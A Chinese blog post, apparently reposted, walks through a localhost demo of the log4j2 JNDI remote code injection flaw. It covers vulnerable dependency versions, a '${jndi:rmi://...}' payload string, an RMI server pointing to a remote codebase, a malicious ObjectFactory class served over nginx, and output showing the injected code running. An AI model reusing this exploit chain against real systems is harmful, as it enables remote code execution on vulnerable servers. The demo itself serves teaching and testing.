log4j2 遠程代碼注入漏洞 demo-有解無憂

網上已經有大量的資料講解了漏洞的原因和發展程序，我主要寫實作程序

依賴：

     <!--log4j 版本< 2.15即可 -->
<dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-core</artifactId>
        <version>2.12.1</version>
      </dependency>
      <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-api</artifactId>
        <version>2.12.1</version>
      </dependency>

日志列印demo

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4jDemo {
    private static final Logger LOGGER = LogManager.getLogger();

    public Log4jDemo() {
    }

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");

        try {
            String name = "${jndi:rmi://127.0.0.1:1099/test}";
            String os = "${java:os}";
            LOGGER.info("tanjunchen");
            LOGGER.info("tanjunchen {}", os);
            LOGGER.info("Hello attack,{}", name);
        } catch (Exception var3) {
        }

    }
}

RMI

RIM 是遠程方法呼叫協議

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import javax.naming.Reference;

public class RMIServer {
    public RMIServer() {
    }

    public static void main(String[] args) {
        try {
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();
            System.out.println("Local Registry RMI in 1099");
            // 類名 和類的全名  和nginx地址
            Reference reference = new Reference("Test", "xxx.Test", "http://127.0.0.1:80/");
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            registry.bind("test", referenceWrapper);
        } catch (Exception var4) {
            var4.printStackTrace();
        }

    }
}

Test 類

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;

public class Test implements ObjectFactory {




    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        System.out.println("--------被注入代碼了--------");
        return null;
    }

}

將Test類編譯好后連同包名復制到nginx 檔案目錄下

nignx下載地址 nginx: download

解壓后使用 start nginx.exe 命令啟動即可

驗證nginx 是否啟動成功瀏覽器輸入 http://127.0.0.1:80/

nginx 使用默認配置即可 config/nginx.conf

將class檔案連同包復制到html目錄下即可

先啟動RMIService 再啟動 Log4jDemo

運行結果

17:43:21.409 [main] INFO com.mikeal.kafkatest.Log4jDemo - tanjunchen
17:43:21.409 [main] INFO com.mikeal.kafkatest.Log4jDemo - tanjunchen Windows 10 10.0, architecture: amd64-64

--------被注入代碼了--------

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/390567.html

標籤：其他

上一篇：原始碼加密產品設計理念的對比

下一篇：IPSec協議